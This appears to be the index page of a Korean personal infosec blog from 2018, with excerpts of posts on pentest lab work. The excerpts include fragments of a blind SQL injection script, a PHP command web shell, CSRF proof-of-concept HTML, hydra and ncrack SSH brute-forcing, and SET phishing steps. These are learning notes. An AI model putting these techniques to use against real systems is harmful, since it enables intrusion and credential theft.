2018 ~ 정보보안(Information Security) 기록 저장소

2018. 12. 30.

[모바일] 애플리케이션 디컴파일 방법

보통 모바일 취약점 점검이라고 하면 소스코드를 갖고 있지 않은 상태에서 디 컴파일을 통해 애플리케이션을 분석해야 한다. 일반적으로 사용하는 디컴파일 도구는 다음과 같다. apktool : http://ibotpeaches.github.io/Apktool dex2jar: https://github.com/pxb1988/dex2jar java Decompiler(jd-gui): http://jd.benow.ca 1. apktool apktool 은 apk 파일로 압축되어 있는 resources.arsc, classes.dex,...

2018. 10. 28.

CSRF poc 코드

오후 7:07 웹 취약점 , WEB

CSRF 취약점은 특정 사용자를 대상으로 하지 않고, 불특정 다수를 대상으로 로그인된 사용자가 자신의 의지와는 무관하게 공격자가 의도한 행위를 하게 만드는 공격이다. XSS 공격은 악성 스크립트가 클라이언트에서 실행되는데 반해, CSRF 공격은 사용자가 악성 스크립트를 서버에 요청한다는 차이가 있다. POST 로 진행 될 경우, 다음과 같이 CSRF 공격을 할 수 있다. 공격자는 이미 특정 물품을 구매하여 장바구니에 넣어두고, 해당 물품에 대한 결재를 다른 이를 통해 다음과 같은 형태로 수행 할 수 있다. <html> <body...

2018. 9. 27.

[웹 취약점] blind sql 인젝션 자동화 스크립트

오전 12:43 웹 취약점 , python , sql injection , WEB

#!/usr/bin/python import urllib, urllib2 import sys # Connect URL def urlcon(query): method = "id=" + urllib.quote(query) # url encode #method += "&" #method += "pw=asd" url = urllib2.Request('http://testsite.com/cat.php?' + method) s = urllib2.urlopen(url) result...

2018. 9. 17.

php :: (스코프 해결 연산자)

오후 11:35 웹 소스 분석 , WEB

php 소스코드를 보면 :: 문자열을 볼 수 있다. 이는 static 이나 constant 와 클래스의 재정의된 프로퍼티나 메서드에 접근할 수 있도록 해주는 토큰이다. class MyClass { const CONST_VALUE = 'A constant value'; } $classname = 'MyClass'; echo $classname::CONST_VALUE; // As of PHP 5.3.0 echo MyClass::CONST_VALUE; 위와 같이 클래스 정의의 외부에서 이 항목들을 참조 할 때, 클래스의 이름을 사용한...

[blogger] 구글 블로거에 소소코드 하이라이트 표시하기

오후 11:18 소스코드 , 하이라이트

<pre><code class="html"> ... </code></pre><pre><code class="language-html"> </code></pre> <pre><code class="language-php"> </code></pre>...

[웹취약점] 소스코드 취약점 점검

오후 10:16 웹 소스 분석 , WEB

소스코드 취약점 점검 관련 간단히 메모 1. 윈도우 일 경우, AstroGrep, Brackets, Everything 2. 유닉스 일 경우는 그저 find, grep,vi 로 다 해결된다. ** grep 명령어 예시 grep -H id /var/www/* -> /var/www/ 의 모든 폴더에서 'id' 라는 문자열을 포함하고 있는 모든 파일을 리스트업 grep -iH id /var/www/* -> i 를 붙임으로서 대소문자 구별 안함 grep -riH select /var/www -->...

2018. 9. 10.

간단 웹쉘 jsp

오전 1:08 웹 취약점 , WEB

/* PHP Version URL CMD WebShell *//* 사용법 : hxxp://URL/cmd.php?cmd=명령어 */<? echo " <FORM ACTION=$PHP_SELF METHOD=POST> ...

2018. 8. 16.

[mutillidae] mutillidae 계정 생성 및 로그인

오전 1:24 mutillidae , VULNERABLE WEB APPLICATIONS

metasploit 에 mutillidae 가 설치되어 있는데 계정을 생성해도 생성되지 않는다. 그 이유는 metasploit.accounts 라는 테이블이 존재하지 않기 때문이다. metasploit 에서 /var/www/multillidae/config.inc 에서 데이터베이스 명을 owasp10 으로 수정해야 한다. # 참조 https://metasploit.help.rapid7.com/docs/metasploitable-2-exploitability-guide https://www.irongeek...

2018. 8. 8.

[metasploitable] nmap 이후 발견된 서비스에 대한 공격 테스트

오전 2:33 kali linux , Metasploitable , nmap

공격 시나리오 : nmap 구동하고 운영 중인 서비스에 대한 모든 공격테스트를 시행한다. nmap 을 구동하고 나온 결과는 다음과 같다. # 21번 ftp p 서비스 21번 현재 kali linux 에서 meta로 ftp 접속이 되지 않는 상황이다. (원인 파악 필요) vsftpd 로 검색한 결과 다음의 모듈을 찾았고 바로 쉘이 실행된다. # 22번 ssh openssh 4.7 버전을 사용하고 있다. ssh 192.168.203.130 -l msfadmin 을 입력하면 password 입력하여...

2018. 8. 7.

[메모] CSS 강의 좋은 곳

오전 2:50 SCRAB , SOMETHING TO SAVE

http://webberstudy.com/html-css/css-2/multi-column-layou...

2018. 8. 6.

[PentestrLAB] from sql to shell 취약점 점검

오전 2:32 웹 취약점 , kali linux , Penteser LAB , WEB

PentesterLab 의 from sql to shell 에 관해 취약점 점검을 해본다. 만약 대역을 지정하고 살아있는 호스트를 검색한다면 nmap -sn x.x.x.x/24 라고 검색했을텐데 나는 특정 호스트의 IP 를 알고 있기 때문에 바로 상세 스캔을 진행한다. # nmap 구동 nmap -sT -sV -A -O -v -p 1-65535 192.168.203.131 스캔 결과 80번 포트가 열려있고 Apache httpd 2.2.16 (Debian) 사용중이라는 정보를 얻을 수 있었다. #...

2018. 8. 5.

metasploitable 설치

오후 11:23 Metasploitable , VULNERABLE WEB APPLICATIONS

# Metasploitable 다운로드 https://sourceforge.net/projects/metasploitable/?source=typ_redirect 기본 계정 정보 (msfadmin/msfadmin) root 비밀번호는 따로 설정해야한다. sudo -s 를 통해 root로 접속한후 passwd 명령어로 루트 비밀번호를 지정한다. (toor/toor) sudo와 su의 차이점 : sudo 는 일반사용자 자신의 비밀번호를 입력하고, su는 루트 비밀번호를 입력한다. root 계정으로 사용자 계정 추가 - adduser test ** 추가, 윈도우 7 이미지 설치 - 90일 평가기간이 주어지므로 vmware 스냅샷 기능으로 활용하면 된다. -...

[Self Question] Linux 에서 윈도우로 ssh 접속

오후 10:40 Self Question , SSH

SSH, FTP 역시 윈도우 계정 정보로 로그인을 한다. 그러나 ssh 서비스는 열려 있는데 windows 계정 패스워드를 설정해놓지 않으면 로그인이 안된다. 패스워드가 있어야 로그인이 된다는 것이다. hydra 로 로그인 무차별 삽입 공격한 모습이다. 취약한 암호는 간단하게 뚫려버리므로 복잡한 암호를 사용해야 한다. 아래는 ncrack 으로 공격한 모습이다. 둘 다 결과를 빠르게 찾았다. ...

[kali linux] ftp 설정 및 메모 정보

오후 10:11 kali linux

kali linux 는 데비안 계열이다. debian 계열 ftp 설정에 관한 메모한다. kali 를 처음 설치했을때 ftp가 기본으로 설치되어 있지 않기 때문에 직접 설치 해야한다. - sudo apt-get install ftp - apt-get install -y vsftpd - etc/vsftpd.conf 설정 local_enable=yes (로컬 사용자의 접속 허용 여부) write_enable=yes (로컬 계정 사용자가 write 허용 여부) local_umask=022 (로컬 계정 사용자용 umask) - /etc/init.d/vsftpd restart - 원격에서 접속...

칼리리눅스를 이용한 사회공학 공격

오후 6:29 kali linux

# setoolkit 1. 도메인 피싱 실행하게 되면 위와 같이 뜨고 1번을 선택한다. - website Attack Vectors 를 선택한다. - Credential harvester attack method 를 선택한다 - web templates 를 선택한다. 웹 템플릿 항목은 set에 내장되어 있는 구글 페이지를 사용하는 것이다. site cloner는 특정 사이트를 지정하여 해당 페이지를 복제하여 공격할 때 사용한다. - kali linux 의 IP를 입력한다. (인터넷망으로 연결해야함) -...

2018. 8. 3.

ARP 패킷 분석

오전 1:55 네트워크

# ARP 패킷 분석 ARP 패킷은 LAN에서 통신을 하기 위해 IP주소(L3) 를 MAC(L2) 로 변환하기 위해 각 장치 간에 주고 받는 패킷이다. 따라서 특정 IP 의 mac 주소가 알고 싶을 때 이 arp request, arp reply 를 통하여 mac 주소를 확인 할 수 있다. 그러면 어떻때 ARP 프로토콜을 사용하는가. (출처 https://m.blog.naver.com/PostView.nhn?blogId=pomm88&logNo=150142212019&proxyReferer=https%3A%2F%2Fwww.google.co.kr%2F) 내부...

피드 구독하기: 글 ( Atom )

정보보안(Information Security) 기록 저장소